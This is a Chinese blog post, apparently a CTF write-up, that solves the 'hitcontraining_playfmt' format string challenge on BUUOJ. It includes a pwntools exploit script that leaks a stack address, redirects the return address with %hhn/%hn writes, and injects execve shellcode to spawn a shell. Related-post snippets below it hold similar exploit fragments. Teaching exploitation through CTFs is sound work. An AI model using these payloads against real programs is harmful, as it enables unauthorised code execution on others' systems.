hitcontraining_playfmt

于 2023-09-14 20:43:20 发布
阅读量85 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132890314
版权

hitcontraining_playfmt

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8047000)
RWX:      Has RWX segments

32位保护全关

int do_fmt()
{
  int result; // eax

  while ( 1 )
  {
    read(0, buf, 0xC8u);
    result = strncmp(buf, "quit", 4u);
    if ( !result )
      break;
    printf(buf);
  }
  return result;
}

存在格式化字符串漏洞,并且是bss段,也就是非栈上的格式化字符串

思路:

劫持ebp,在bss上写入shellcode,然后改retn_addr --> bss

劫持这些二级指针,对照这gdb就能修改

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",29059,"./pwn",0)
context(os='linux', arch='i386',log_level='debug')
libc=ELF('libc-2.23.so')

#6 10 15
# sl(b'%15$p')
# leak=get_addr_int(8)-247-libc.sym['__libc_start_main']
# li(leak)
sl(b'%6$p')
stack=get_addr_int(8)-0x28#-247-libc.sym['__libc_start_main']
li(stack)
pl="%"+str((stack+0x1c)&0xff)+"c%6$hhn"
sl(pl)
pl="%"+str(0xA064)+"c%10$hn"
sl(pl)
shell=asm(shellcraft.sh())
pl=b'quit'+b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
sl(pl)
debug('b *0x804854f')

ia()

在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hitcontraining_playfmt 解题思路
Morphy_Amo的博客
03-19 666
格式化字符串
c语言格式化字符漏洞,格式化字符串漏洞题目练习
weixin_30111277的博客
05-22 889
整合一下最近做的格式化字符串题目的练习,把wp给写一下,方便对总结对这个漏洞的利用套路和技巧。inndy_echo保护和arch[*] '/media/psf/mypwn2/buuctf/inndy_echo/echo'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabl...
BUUCTF-pwn(9)
njh18790816639的博客
01-05 787
gyctf_2020_borrowstack 使用栈迁移,将rsp迁移到bss段上,而bss段上处于可控位置。但是注意bss段低处处于不可写状态,如果rsp移动到该处,则程序无法进行下去! 尝试使用system函数,但是往往会涉及到bss段低处地址,而one_gadget则不需要过多占用栈地址,故采用one_gadget获取权限! from pwn import * from LibcSearcher import LibcSearcher context(log_level='debug',os='l
hitcontraining_uaf
z1r0的博客
12-10 1506
hitcontraining_uaf 查看保护 有uaf,还有后门函数 这里会将show的功能存放在堆里,没有pie所以思路就是将print_note_content这个功能改成magic就可以了,改完show一下就可以执行magic。 申请两个0x10堆, 释放掉,有uaf,没有清0。 这时再申请一个0x8的堆,因为fastbin,填充content时其实就改的是print_note_content。 content放入magic即可。 from pwn import * context(arc
HITCON-training lab10 wp
qq_43409582的博客
01-30 1650
0x00 开始堆利用的学习了,先做第一入门题目,UAF漏洞利用。 0x01 看保护: 一个32位的开了canary和nx保护 0x02 ida分析 一个菜单有加、减、查看功能 看add是什么样子 1-2 .先会malloc一个8字节的空间,指向print_note_content函数,用来打印content。 3-4 .再malloc一个size用来存放你写入的content 再看看del_n...
暑假集训——Hitcon_Trainning——lab9_playfmt——格式化字符串漏洞_字符串在bss段
qq_41667316的博客
07-13 716
格式化字符串漏洞 思路 一开始就是没有思路,太菜了,真的太菜了TAT。 这里的buf是在bss段,也就是意味着没有办法用常规方法做。 看了大佬的wp才知道可以控制ebp来实现地址任意写。 但是我觉得或许用栈迁移也可以试一下。 先写一波控制ebp! 控制ebp 首先,格式化字符串漏洞的两个利用方式 泄露栈上内容 改写某地址内容(前提是这个地址要在栈上,也就是printf可控的地方) 原理...
hitcontraining_bamboobox
像初雪一样自由洒落
04-24 700
hitcontraining_bamboobox这道题有两种解题方式: house of force 参考:house of force unlink house of force(详解) 知识点 只要top chunk size够大,就能随意申请chunk 所以,如果有溢出能控制top chunk size,就可以修改其为-1(0xffffffff最大值),然后malloc(负数)可以向上申请,malloc(正数) 题目流程 程序一开始申请0x10的块,存放hello_message和.
buuoj Pwn writeup 161-165
yongbaoii的博客
05-30 367
161 picoctf_2018_echooo 就是格式化字符串 flag被读到了栈上,直接泄露就行。 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" r = remote('node3.buuoj.cn',25088) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) r.sendlin
HITCON-Training-Writeup
baikeng3674的博客
03-14 560
HITCON-Training-Writeup 原文链接M4x@10.0.0.55 项目地址M4x's github,欢迎star~ 更新时间5月16 复习一下二进制基础,写写HITCON-Training的writeup,题目地址:https://github.com/scwuaptx/HITCON-Training Outline Basic Knowledge In...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 程序如何运行 部分 x86组装 通话约定 实验2-打开/读取/写入 外壳编码 堆栈溢出 缓冲区溢出 返回文本/ Shellcode 实验3-ret2shellcode 保护ASLR / DEP / PIE / StackGuard 延迟绑定 返回图书馆实验4-ret2lib 面向返
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理.....................................................................................................................................................................................................................
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4290
BUUCTF刷题记录
BUUCTF pwn wp 146 - 150
fa1c4的blog
04-30 544
hitcontraining_playfmt gwctf_2019_easy_pwn bctf2016_bcloud asis2016_b00ks warmup
某道Pwn(格式化字符串漏洞)
热门推荐
龙哥盟
03-18 4万+
格式化字符串漏洞近几年出现频率少了,但是一些 CTF 中还有涉及,就当玩玩好了。首先看这一段代码,什么比赛的题我忘了:#include <stdio.h> int main(void) { int flag = 0; int *p = &flag; char a[100]; scanf("%s",a); printf(a); if(flag ==
buuctf hitcon_training,axb_2019_heap,unlink一般利用方法总结
weixin_46521144的博客
07-10 183
两道都是使用了unlink 并且两道题的方法一模一样,和上一篇的ZCTF的一道题也一样 使用unlink的题目一般有这样的特征 指针位置泄露(这三道题全都是在bss上的指针) 存在off-by-one或者off-by-null以及其他溢出修改漏洞 第一条用于控制unlink堆块的检验,第二条用于激活unlink,两者缺一不可。 利用方法: 制造unlink块,修改fd为ptr-0x18,bk为ptr-0x10,构造chunk_head和下一个chunk的prev_size,通过off修改下一个chun
HITCON-Training lab7(一道简单的格式化字符串读漏洞)
像初雪一样自由洒落
03-27 257
格式化字符串知道他的操作,可是做的一点也不熟练吧,,,BJDCTF上的r2t4不会啊,,,看不懂,,,所以就来补补格式化字符串的题目了,,,, 看到canary开启了,我还以为要泄漏canary呢,结果发现不用那么麻烦,,, 其实看下,思路很清晰,先让你输入东西,然后返回给你,然后你输入password,如果和程序中的一样,你就拿到flag了,, 所以输入的东西里面需要泄漏pa...
HITCON-Training-master lab2 wp
zszcr的博客
04-03 666
查看了下防护机制发现开启了Canary,但是没关系,它没开启堆栈不可执行,说明 这是一道shell code题简单跑了一下程序,发现输出了一句话:give me you shellcodeida反编译查看了下代码代码逻辑也很简单,你输入一段shellcode,然后去执行它我随便去网上找了一段shellcode,输入后发现不行,说明它不是单纯的让我们输入shellcode查看了一下orw_secco...
HITCON-Training lab10(uaf入门题)
像初雪一样自由洒落
03-08 723
题目下载地址:https://github.com/scwuaptx/HITCON-Training 哈哈哈,纪念一下明白的第一道堆题,虽然它真的很简单。。。 32位程序 三个功能,增、删、打印 程序给我们预留了后门函数 add函数,创建note会有两个堆块,分别是存放两个函数指针的8字节堆块和存放内容的堆块 这个示意图很清楚: ...
HITCON-trainning&寒假做题记录
Peanuts
01-28 658
HITCON-trainning 2019.1.27 是一些好题目这几天准备重新做一遍预计两天之内完成现在做到lab7 题目地址:https://github.com/scwuaptx/HITCON-Training lab1 比较简单的逆向题这里就不贴代码了,就是一个疑惑解码 lab2 一个普通的int0x80的一个shellcode编写这里就不多讲了感觉没有什么 lab3 ret2sc 原理比...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值